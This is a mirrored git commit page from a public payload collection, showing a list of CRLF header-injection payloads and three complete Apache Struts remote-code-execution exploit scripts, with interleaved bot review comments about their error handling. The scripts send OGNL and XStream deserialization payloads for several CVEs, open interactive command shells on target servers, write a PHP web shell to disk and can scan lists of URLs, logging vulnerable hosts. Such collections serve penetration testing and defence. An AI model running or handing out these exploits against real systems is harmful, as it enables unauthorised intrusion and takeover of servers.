mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-05-09 11:46:14 +02:00

Deployed 9571306 with MkDocs version: 1.5.3

Swk 2024-04-05 13:53:49 +00:00
commit c5b83becd7
575 changed files with 791669 additions and 0 deletions

0
.nojekyll Normal file

5595
404.html Normal file

File diff suppressed because one or more lines are too long

File diff suppressed because it is too large Load Diff

6329
API Key Leaks/index.html Normal file

File diff suppressed because one or more lines are too long

File diff suppressed because one or more lines are too long

6548
Account Takeover/index.html Normal file

File diff suppressed because one or more lines are too long

File diff suppressed because one or more lines are too long

File diff suppressed because one or more lines are too long

6337
CICD/index.html Normal file

File diff suppressed because one or more lines are too long

5829
CONTRIBUTING/index.html Normal file

File diff suppressed because one or more lines are too long

File diff suppressed because one or more lines are too long


@ -0,0 +1,17 @@
/%%0a0aSet-Cookie:crlf=injection
/%0aSet-Cookie:crlf=injection
/%0d%0aSet-Cookie:crlf=injection
/%0dSet-Cookie:crlf=injection
/%23%0aSet-Cookie:crlf=injection
/%23%0d%0aSet-Cookie:crlf=injection
/%23%0dSet-Cookie:crlf=injection
/%25%30%61Set-Cookie:crlf=injection
/%25%30aSet-Cookie:crlf=injection
/%250aSet-Cookie:crlf=injection
/%25250aSet-Cookie:crlf=injection
/%2e%2e%2f%0d%0aSet-Cookie:crlf=injection
/%2f%2e%2e%0d%0aSet-Cookie:crlf=injection
/%2F..%0d%0aSet-Cookie:crlf=injection
/%3f%0d%0aSet-Cookie:crlf=injection
/%3f%0dSet-Cookie:crlf=injection
/%u000aSet-Cookie:crlf=injection

5937
CRLF Injection/index.html Normal file

File diff suppressed because one or more lines are too long

Binary file not shown.

After

Width:  |  Height:  |  Size: 407 KiB

6256
CSRF Injection/index.html Normal file

File diff suppressed because one or more lines are too long

5811
CSV Injection/index.html Normal file

File diff suppressed because one or more lines are too long


@ -0,0 +1,215 @@
#!/usr/bin/python
from __future__ import print_function
from future import standard_library
standard_library.install_aliases()
from builtins import input
from builtins import str
import urllib.request, urllib.error, urllib.parse
import time
import sys
import os
import subprocess
import requests
import readline
import urllib.parse
RED = '\033[1;31m'
BLUE = '\033[94m'
BOLD = '\033[1m'
GREEN = '\033[32m'
OTRO = '\033[36m'
YELLOW = '\033[33m'
ENDC = '\033[0m'
def cls():
os.system(['clear', 'cls'][os.name == 'nt'])
cls()
logo = BLUE+'''
___ _____ ___ _ _ _____ ___
( _`\(_ _)| _`\ ( ) ( )(_ _)( _`\
| (_(_) | | | (_) )| | | | | | | (_(_)
`\__ \ | | | , / | | | | | | `\__ \
( )_) | | | | |\ \ | (_) | | | ( )_) |
`\____) (_) (_) (_)(_____) (_) `\____)
=[ Command Execution v3]=
By @s1kr10s
'''+ENDC
print(logo)
print(" * Ejemplo: http(s)://www.victima.com/files.login\n")
host = input(BOLD+" [+] HOST: "+ENDC)
if len(host) > 0:
if host.find("https://") != -1 or host.find("http://") != -1:
poc = "?redirect:${%23w%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29.getWriter%28%29,%23w.println%28%27mamalo%27%29,%23w.flush%28%29,%23w.close%28%29}"
def exploit(comando):
exploit = "?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{"+comando+"}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29}"
return exploit
def exploit2(comando):
exploit2 = "Content-Type:%{(+++#_='multipart/form-data').(+++#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(+++#_memberAccess?(+++#_memberAccess=#dm):((+++#container=#context['com.opensymphony.xwork2.ActionContext.container']).(+++#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(+++#ognlUtil.getExcludedPackageNames().clear()).(+++#ognlUtil.getExcludedClasses().clear()).(+++#context.setMemberAccess(+++#dm)))).(+++#shell='"+str(comando)+"').(+++#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(+++#shells=(+++#iswin?{'cmd.exe','/c',#shell}:{'/bin/sh','-c',#shell})).(+++#p=new java.lang.ProcessBuilder(+++#shells)).(+++#p.redirectErrorStream(true)).(+++#process=#p.start()).(+++#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(+++#process.getInputStream(),#ros)).(+++#ros.flush())}"
return exploit2
def exploit3(comando):
exploit3 = "%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27"+comando+"%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D"
return exploit3
def pwnd(shellfile):
exploitfile = "?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{"+shellfile+"}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29}"
return exploitfile
def validador():
arr_lin_win = ["file%20/etc/passwd","dir","net%20users","id","/sbin/ifconfig","cat%20/etc/passwd"]
return arr_lin_win
#def reversepl(ip,port):
# print "perl"
#def reversepy(ip,port):
# print "python"
# CVE-2013-2251 ---------------------------------------------------------------------------------
try:
response = ''
response = urllib.request.urlopen(host+poc)
except:
print(RED+" Servidor no responde\n"+ENDC)
exit(0)
print(BOLD+"\n [+] EJECUTANDO EXPLOIT CVE-2013-2251"+ENDC)
if response.read().find("mamalo") != -1:
print(RED+" [-] VULNERABLE"+ENDC)
owned = open('vulnsite.txt', 'a')
owned.write(str(host)+'\n')
owned.close()
opcion = input(YELLOW+" [-] RUN THIS EXPLOIT (s/n): "+ENDC)
#print BOLD+" * [SHELL REVERSA]"+ENDC
#print OTRO+" Struts@Shell:$ reverse 127.0.0.1 4444 (perl,python,bash)\n"+ENDC
if opcion == 's':
print(YELLOW+" [-] GET PROMPT...\n"+ENDC)
time.sleep(1)
print(BOLD+" * [UPLOAD SHELL]"+ENDC)
print(OTRO+" Struts@Shell:$ pwnd (php)\n"+ENDC)
while 1:
separador = input(GREEN+"Struts2@Shell_1:$ "+ENDC)
espacio = separador.split(' ')
comando = "','".join(espacio)
if espacio[0] != 'reverse' and espacio[0] != 'pwnd':
shell = urllib.request.urlopen(host+exploit("'"+str(comando)+"'"))
print("\n"+shell.read())
elif espacio[0] == 'pwnd':
pathsave=input("path EJ:/tmp/: ")
if espacio[1] == 'php':
shellfile = """'python','-c','f%3dopen("/tmp/status.php","w");f.write("<?php%20system($_GET[ksujenenuhw])?>")'"""
urllib.request.urlopen(host+pwnd(str(shellfile)))
shell = urllib.request.urlopen(host+exploit("'ls','-l','"+pathsave+"status.php'"))
if shell.read().find(pathsave+"status.php") != -1:
print(BOLD+GREEN+"\nCreate File Successfull :) ["+pathsave+"status.php]\n"+ENDC)
else:
print(BOLD+RED+"\nNo Create File :/\n"+ENDC)
# CVE-2017-5638 ---------------------------------------------------------------------------------
print(BLUE+" [-] NO VULNERABLE"+ENDC)
print(BOLD+" [+] EJECUTANDO EXPLOIT CVE-2017-5638"+ENDC)
x = 0
while x < len(validador()):
valida = validador()[x]
try:
req = urllib.request.Request(host, None, {'User-Agent': 'Mozilla/5.0', 'Content-Type': exploit2(str(valida))})
result = urllib.request.urlopen(req).read()
if result.find("ASCII") != -1 or result.find("No such") != -1 or result.find("Directory of") != -1 or result.find("Volume Serial") != -1 or result.find("inet") != -1 or result.find("root:") != -1 or result.find("uid=") != -1 or result.find("accounts") != -1 or result.find("Cuentas") != -1:
print(RED+" [-] VULNERABLE"+ENDC)
owned = open('vulnsite.txt', 'a')
owned.write(str(host)+'\n')
owned.close()
opcion = input(YELLOW+" [-] RUN THIS EXPLOIT (s/n): "+ENDC)
if opcion == 's':
print(YELLOW+" [-] GET PROMPT...\n"+ENDC)
time.sleep(1)
while 1:
try:
separador = input(GREEN+"\nStruts2@Shell_2:$ "+ENDC)
req = urllib.request.Request(host, None, {'User-Agent': 'Mozilla/5.0', 'Content-Type': exploit2(str(separador))})
result = urllib.request.urlopen(req).read()
print("\n"+result)
except:
exit(0)
else:
x = len(validador())
else:
print(BLUE+" [-] NO VULNERABLE "+ENDC + "Payload: " + str(x))
except:
pass
x=x+1
# CVE-2018-11776 ---------------------------------------------------------------------------------
print(BLUE+" [-] NO VULNERABLE"+ENDC)
print(BOLD+" [+] EJECUTANDO EXPLOIT CVE-2018-11776"+ENDC)
x = 0
while x < len(validador()):
#Filtramos la url solo dominio
url = host.replace('#', '%23')
url = host.replace(' ', '%20')
if ('://' not in url):
url = str("http://") + str(url)
scheme = urllib.parse.urlparse(url).scheme
site = scheme + '://' + urllib.parse.urlparse(url).netloc
#Filtramos la url solo path
file_path = urllib.parse.urlparse(url).path
if (file_path == ''):
file_path = '/'
valida = validador()[x]
try:
result = requests.get(site+"/"+exploit3(str(valida))+file_path).text
if result.find("ASCII") != -1 or result.find("No such") != -1 or result.find("Directory of") != -1 or result.find("Volume Serial") != -1 or result.find("inet") != -1 or result.find("root:") != -1 or result.find("uid=") != -1 or result.find("accounts") != -1 or result.find("Cuentas") != -1:
print(RED+" [-] VULNERABLE"+ENDC)
owned = open('vulnsite.txt', 'a')
owned.write(str(host)+'\n')
owned.close()
opcion = input(YELLOW+" [-] RUN THIS EXPLOIT (s/n): "+ENDC)
if opcion == 's':
print(YELLOW+" [-] GET PROMPT...\n"+ENDC)
time.sleep(1)
print(BOLD+" * [UPLOAD SHELL]"+ENDC)
print(OTRO+" Struts@Shell:$ pwnd (php)\n"+ENDC)
while 1:
separador = input(GREEN+"Struts2@Shell_3:$ "+ENDC)
espacio = separador.split(' ')
comando = "%20".join(espacio)
shell = urllib.request.urlopen(host+exploit3(str(comando)))
print("\n"+shell.read())
else:
x = len(validador())
exit(0)
else:
print(BLUE+" [-] NO VULNERABLE "+ENDC + "Payload: " + str(x))
except:
pass
x=x+1
else:
print(RED+" Debe introducir el protocolo (https o http) para el dominio\n"+ENDC)
exit(0)
else:
print(RED+" Debe Ingresar una Url\n"+ENDC)
exit(0)
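Review bot: The bare `except:` handlers, one after the first `urlopen(host+poc)` call and an `except: pass` closing each payload loop for CVE-2017-5638 and CVE-2018-11776, discard every error, so a run that never prints `VULNERABLE` is not evidence that a host is patched. On Python 3 `urlopen(...).read()` returns bytes, and the `result.find("ASCII")` style comparisons against str in the CVE-2017-5638 loop would raise a TypeError that `except: pass` then hides. Catch the transport error specifically and report it, e.g. `except urllib.error.URLError as e: print(RED+" Error: "+str(e)+ENDC)`, and let other exceptions surface. The page has lost the file's indentation, so the nesting of these handlers is inferred from statement order.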


@ -0,0 +1,326 @@
#!/usr/bin/env python3
# coding=utf-8
# *****************************************************
# struts-pwn: Apache Struts CVE-2017-9805 Exploit
# Author:
# Mazin Ahmed <Mazin AT MazinAhmed DOT net>
# This code is based on:
# https://github.com/rapid7/metasploit-framework/pull/8924
# https://techblog.mediaservice.net/2017/09/detection-payload-for-the-new-struts-rest-vulnerability-cve-2017-9805/
# *****************************************************
from __future__ import print_function
from builtins import str
import argparse
import requests
import sys
# Disable SSL warnings
try:
import requests.packages.urllib3
requests.packages.urllib3.disable_warnings()
except Exception:
pass
if len(sys.argv) <= 1:
print('[*] CVE: 2017-9805 - Apache Struts2 S2-052')
print('[*] Struts-PWN - @mazen160')
print('\n%s -h for help.' % (sys.argv[0]))
exit(0)
parser = argparse.ArgumentParser()
parser.add_argument("-u", "--url",
dest="url",
help="Check a single URL.",
action='store')
parser.add_argument("-l", "--list",
dest="usedlist",
help="Check a list of URLs.",
action='store')
parser.add_argument("-c", "--cmd",
dest="cmd",
help="Command to execute. (Default: 'echo test > /tmp/struts-pwn')",
action='store',
default='echo test > /tmp/struts-pwn')
parser.add_argument("--exploit",
dest="do_exploit",
help="Exploit.",
action='store_true')
args = parser.parse_args()
url = args.url if args.url else None
usedlist = args.usedlist if args.usedlist else None
url = args.url if args.url else None
cmd = args.cmd if args.cmd else None
do_exploit = args.do_exploit if args.do_exploit else None
def url_prepare(url):
url = url.replace('#', '%23')
url = url.replace(' ', '%20')
if ('://' not in url):
url = str('http') + str('://') + str(url)
return(url)
def exploit(url, cmd, dont_print_status_on_console=False):
url = url_prepare(url)
if dont_print_status_on_console is False:
print('\n[*] URL: %s' % (url))
print('[*] CMD: %s' % (cmd))
cmd = "".join(["<string>{0}</string>".format(_) for _ in cmd.split(" ")])
payload = """
<map>
<entry>
<jdk.nashorn.internal.objects.NativeString>
<flags>0</flags>
<value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
<dataHandler>
<dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
<is class="javax.crypto.CipherInputStream">
<cipher class="javax.crypto.NullCipher">
<initialized>false</initialized>
<opmode>0</opmode>
<serviceIterator class="javax.imageio.spi.FilterIterator">
<iter class="javax.imageio.spi.FilterIterator">
<iter class="java.util.Collections$EmptyIterator"/>
<next class="java.lang.ProcessBuilder">
<command>
{0}
</command>
<redirectErrorStream>false</redirectErrorStream>
</next>
</iter>
<filter class="javax.imageio.ImageIO$ContainsFilter">
<method>
<class>java.lang.ProcessBuilder</class>
<name>start</name>
<parameter-types/>
</method>
<name>foo</name>
</filter>
<next class="string">foo</next>
</serviceIterator>
<lock/>
</cipher>
<input class="java.lang.ProcessBuilder$NullInputStream"/>
<ibuffer/>
<done>false</done>
<ostart>0</ostart>
<ofinish>0</ofinish>
<closed>false</closed>
</is>
<consumed>false</consumed>
</dataSource>
<transferFlavors/>
</dataHandler>
<dataLen>0</dataLen>
</value>
</jdk.nashorn.internal.objects.NativeString>
<jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
</entry>
<entry>
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
</entry>
</map>
""".format(cmd)
headers = {
'User-Agent': 'struts-pwn (https://github.com/mazen160/struts-pwn_CVE-2017-9805)',
# 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36',
'Referer': str(url),
'Content-Type': 'application/xml',
'Accept': '*/*'
}
timeout = 3
try:
output = requests.post(url, data=payload, headers=headers, verify=False, timeout=timeout, allow_redirects=False).text
except Exception as e:
print("EXCEPTION::::--> " + str(e))
output = 'ERROR'
return(output)
def check(url):
url = url_prepare(url)
print('\n[*] URL: %s' % (url))
initial_request = exploit(url, "", dont_print_status_on_console=True)
if initial_request == "ERROR":
result = False
print("The host does not respond as expected.")
return(result)
payload_sleep_based_10seconds = """
<map>
<entry>
<jdk.nashorn.internal.objects.NativeString>
<flags>0</flags>
<value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
<dataHandler>
<dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
<is class="javax.crypto.CipherInputStream">
<cipher class="javax.crypto.NullCipher">
<initialized>false</initialized>
<opmode>0</opmode>
<serviceIterator class="javax.imageio.spi.FilterIterator">
<iter class="javax.imageio.spi.FilterIterator">
<iter class="java.util.Collections$EmptyIterator"/>
<next class="com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl" serialization="custom">
<com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>
<default>
<__name>Pwnr</__name>
<__bytecodes>
<byte-array>yv66vgAAADIAMwoAAwAiBwAxBwAlBwAmAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFu
dFZhbHVlBa0gk/OR3e8+AQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEA
EkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBABNTdHViVHJhbnNsZXRQYXlsb2FkAQAMSW5uZXJD
bGFzc2VzAQA1THlzb3NlcmlhbC9wYXlsb2Fkcy91dGlsL0dhZGdldHMkU3R1YlRyYW5zbGV0UGF5
bG9hZDsBAAl0cmFuc2Zvcm0BAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94
c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2Vy
aWFsaXphdGlvbkhhbmRsZXI7KVYBAAhkb2N1bWVudAEALUxjb20vc3VuL29yZy9hcGFjaGUveGFs
YW4vaW50ZXJuYWwveHNsdGMvRE9NOwEACGhhbmRsZXJzAQBCW0xjb20vc3VuL29yZy9hcGFjaGUv
eG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKRXhjZXB0aW9u
cwcAJwEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29t
L3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3Vu
L29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7
KVYBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1B
eGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFs
L3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKU291cmNlRmlsZQEADEdhZGdldHMu
amF2YQwACgALBwAoAQAzeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRTdHViVHJhbnNs
ZXRQYXlsb2FkAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRp
bWUvQWJzdHJhY3RUcmFuc2xldAEAFGphdmEvaW8vU2VyaWFsaXphYmxlAQA5Y29tL3N1bi9vcmcv
YXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAfeXNvc2VyaWFs
L3BheWxvYWRzL3V0aWwvR2FkZ2V0cwEACDxjbGluaXQ+AQAQamF2YS9sYW5nL1RocmVhZAcAKgEA
BXNsZWVwAQAEKEopVgwALAAtCgArAC4BAA1TdGFja01hcFRhYmxlAQAeeXNvc2VyaWFsL1B3bmVy
MTY3MTMxNTc4NjQ1ODk0AQAgTHlzb3NlcmlhbC9Qd25lcjE2NzEzMTU3ODY0NTg5NDsAIQACAAMA
AQAEAAEAGgAFAAYAAQAHAAAAAgAIAAQAAQAKAAsAAQAMAAAALwABAAEAAAAFKrcAAbEAAAACAA0A
AAAGAAEAAAAuAA4AAAAMAAEAAAAFAA8AMgAAAAEAEwAUAAIADAAAAD8AAAADAAAAAbEAAAACAA0A
AAAGAAEAAAAzAA4AAAAgAAMAAAABAA8AMgAAAAAAAQAVABYAAQAAAAEAFwAYAAIAGQAAAAQAAQAa
AAEAEwAbAAIADAAAAEkAAAAEAAAAAbEAAAACAA0AAAAGAAEAAAA3AA4AAAAqAAQAAAABAA8AMgAA
AAAAAQAVABYAAQAAAAEAHAAdAAIAAAABAB4AHwADABkAAAAEAAEAGgAIACkACwABAAwAAAAiAAMA
AgAAAA2nAAMBTBEnEIW4AC+xAAAAAQAwAAAAAwABAwACACAAAAACACEAEQAAAAoAAQACACMAEAAJ
</byte-array>
<byte-array>yv66vgAAADIAGwoAAwAVBwAXBwAYBwAZAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFu
dFZhbHVlBXHmae48bUcYAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEA
EkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBAANGb28BAAxJbm5lckNsYXNzZXMBACVMeXNvc2Vy
aWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRGb287AQAKU291cmNlRmlsZQEADEdhZGdldHMuamF2
YQwACgALBwAaAQAjeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRGb28BABBqYXZhL2xh
bmcvT2JqZWN0AQAUamF2YS9pby9TZXJpYWxpemFibGUBAB95c29zZXJpYWwvcGF5bG9hZHMvdXRp
bC9HYWRnZXRzACEAAgADAAEABAABABoABQAGAAEABwAAAAIACAABAAEACgALAAEADAAAAC8AAQAB
AAAABSq3AAGxAAAAAgANAAAABgABAAAAOwAOAAAADAABAAAABQAPABIAAAACABMAAAACABQAEQAA
AAoAAQACABYAEAAJ</byte-array>
</__bytecodes>
<__transletIndex>-1</__transletIndex>
<__indentNumber>0</__indentNumber>
</default>
<boolean>false</boolean>
</com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>
</next>
</iter>
<filter class="javax.imageio.ImageIO$ContainsFilter">
<method>
<class>com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl</class>
<name>newTransformer</name>
<parameter-types/>
</method>
<name>foo</name>
</filter>
<next class="string">foo</next>
</serviceIterator>
<lock/>
</cipher>
<input class="java.lang.ProcessBuilder$NullInputStream"/>
<ibuffer/>
<done>false</done>
<ostart>0</ostart>
<ofinish>0</ofinish>
<closed>false</closed>
</is>
<consumed>false</consumed>
</dataSource>
<transferFlavors/>
</dataHandler>
<dataLen>0</dataLen>
</value>
</jdk.nashorn.internal.objects.NativeString>
<jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
</entry>
<entry>
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
</entry>
</map>
"""
headers = {
'User-Agent': 'struts-pwn (https://github.com/mazen160/struts-pwn_CVE-2017-9805)',
# 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36',
'Referer': str(url),
'Content-Type': 'application/xml',
'Accept': '*/*'
}
timeout = 8
try:
requests.post(url, data=payload_sleep_based_10seconds, headers=headers, verify=False, timeout=timeout, allow_redirects=False)
# if the response returned before the request timeout.
# then, the host should not be vulnerable.
# The request should return > 10 seconds, while the timeout is 8.
result = False
except Exception:
result = True
return(result)
def main(url=url, usedlist=usedlist, cmd=cmd, do_exploit=do_exploit):
if url:
if not do_exploit:
result = check(url)
output = '[*] Status: '
if result is True:
output += 'Vulnerable!'
else:
output += 'Not Affected.'
print(output)
else:
exploit(url, cmd)
print("[$] Request sent.")
print("[.] If the host is vulnerable, the command will be executed in the background.")
if usedlist:
URLs_List = []
try:
f_file = open(str(usedlist), 'r')
URLs_List = f_file.read().replace('\r', '').split('\n')
try:
URLs_List.remove('')
except ValueError:
pass
f_file.close()
except Exception as e:
print('Error: There was an error in reading list file.')
print("Exception: " + str(e))
exit(1)
for url in URLs_List:
if not do_exploit:
result = check(url)
output = '[*] Status: '
if result is True:
output += 'Vulnerable!'
else:
output += 'Not Affected.'
print(output)
else:
exploit(url, cmd)
print("[$] Request sent.")
print("[.] If the host is vulnerable, the command will be executed in the background.")
print('[%] Done.')
if __name__ == '__main__':
try:
main(url=url, usedlist=usedlist, cmd=cmd, do_exploit=do_exploit)
except KeyboardInterrupt:
print('\nKeyboardInterrupt Detected.')
print('Exiting...')
exit(0)
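Review bot: `check()` reports a host as vulnerable on any exception from its second `requests.post` call (`except Exception: result = True`), so a connection reset, a TLS failure or a slow but patched server is counted as a positive. The test is timing-based (the comments expect the response to take more than 10 seconds against a timeout of 8), so only a read timeout should count: `except requests.exceptions.ReadTimeout: result = True`, followed by `except requests.exceptions.RequestException: result = False`. Until that is narrowed, anyone using the output to triage their own hosts should treat "Vulnerable!" as unconfirmed.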


@ -0,0 +1,231 @@
#!/usr/bin/env python3
# coding=utf-8
# *****************************************************
# struts-pwn: Apache Struts CVE-2018-11776 Exploit
# Author:
# Mazin Ahmed <Mazin AT MazinAhmed DOT net>
# This code uses a payload from:
# https://github.com/jas502n/St2-057
# *****************************************************
from __future__ import print_function
from future import standard_library
standard_library.install_aliases()
from builtins import str
from builtins import range
import argparse
import random
import requests
import sys
try:
from urllib import parse as urlparse
except ImportError:
import urllib.parse
# Disable SSL warnings
try:
import requests.packages.urllib3
requests.packages.urllib3.disable_warnings()
except Exception:
pass
if len(sys.argv) <= 1:
print('[*] CVE: 2018-11776 - Apache Struts2 S2-057')
print('[*] Struts-PWN - @mazen160')
print('\n%s -h for help.' % (sys.argv[0]))
exit(0)
parser = argparse.ArgumentParser()
parser.add_argument("-u", "--url",
dest="url",
help="Check a single URL.",
action='store')
parser.add_argument("-l", "--list",
dest="usedlist",
help="Check a list of URLs.",
action='store')
parser.add_argument("-c", "--cmd",
dest="cmd",
help="Command to execute. (Default: 'id')",
action='store',
default='id')
parser.add_argument("--exploit",
dest="do_exploit",
help="Exploit.",
action='store_true')
args = parser.parse_args()
url = args.url if args.url else None
usedlist = args.usedlist if args.usedlist else None
cmd = args.cmd if args.cmd else None
do_exploit = args.do_exploit if args.do_exploit else None
headers = {
'User-Agent': 'struts-pwn (https://github.com/mazen160/struts-pwn_CVE-2018-11776)',
# 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36',
'Accept': '*/*'
}
timeout = 3
def parse_url(url):
"""
Parses the URL.
"""
# url: http://example.com/demo/struts2-showcase/index.action
url = url.replace('#', '%23')
url = url.replace(' ', '%20')
if ('://' not in url):
url = str("http://") + str(url)
scheme = urllib.parse.urlparse(url).scheme
# Site: http://example.com
site = scheme + '://' + urllib.parse.urlparse(url).netloc
# FilePath: /demo/struts2-showcase/index.action
file_path = urllib.parse.urlparse(url).path
if (file_path == ''):
file_path = '/'
# Filename: index.action
try:
filename = url.split('/')[-1]
except IndexError:
filename = ''
# File Dir: /demo/struts2-showcase/
file_dir = file_path.rstrip(filename)
if (file_dir == ''):
file_dir = '/'
return({"site": site,
"file_dir": file_dir,
"filename": filename})
def build_injection_inputs(url):
"""
Builds injection inputs for the check.
"""
parsed_url = parse_url(url)
injection_inputs = []
url_directories = parsed_url["file_dir"].split("/")
try:
url_directories.remove("")
except ValueError:
pass
for i in range(len(url_directories)):
injection_entry = "/".join(url_directories[:i])
if not injection_entry.startswith("/"):
injection_entry = "/%s" % (injection_entry)
if not injection_entry.endswith("/"):
injection_entry = "%s/" % (injection_entry)
injection_entry += "{{INJECTION_POINT}}/" # It will be renderred later with the payload.
injection_entry += parsed_url["filename"]
injection_inputs.append(injection_entry)
return(injection_inputs)
def check(url):
random_value = int(''.join(random.choice('0123456789') for i in range(2)))
multiplication_value = random_value * random_value
injection_points = build_injection_inputs(url)
parsed_url = parse_url(url)
print("[%] Checking for CVE-2018-11776")
print("[*] URL: %s" % (url))
print("[*] Total of Attempts: (%s)" % (len(injection_points)))
attempts_counter = 0
for injection_point in injection_points:
attempts_counter += 1
print("[%s/%s]" % (attempts_counter, len(injection_points)))
testing_url = "%s%s" % (parsed_url["site"], injection_point)
testing_url = testing_url.replace("{{INJECTION_POINT}}", "${{%s*%s}}" % (random_value, random_value))
try:
resp = requests.get(testing_url, headers=headers, verify=False, timeout=timeout, allow_redirects=False)
except Exception as e:
print("EXCEPTION::::--> " + str(e))
continue
if "Location" in list(resp.headers.keys()):
if str(multiplication_value) in resp.headers['Location']:
print("[*] Status: Vulnerable!")
return(injection_point)
print("[*] Status: Not Affected.")
return(None)
def exploit(url, cmd):
parsed_url = parse_url(url)
injection_point = check(url)
if injection_point is None:
print("[%] Target is not vulnerable.")
return(0)
print("[%] Exploiting...")
payload = """%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27{0}%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D""".format(cmd)
testing_url = "%s%s" % (parsed_url["site"], injection_point)
testing_url = testing_url.replace("{{INJECTION_POINT}}", payload)
try:
resp = requests.get(testing_url, headers=headers, verify=False, timeout=timeout, allow_redirects=False)
except Exception as e:
print("EXCEPTION::::--> " + str(e))
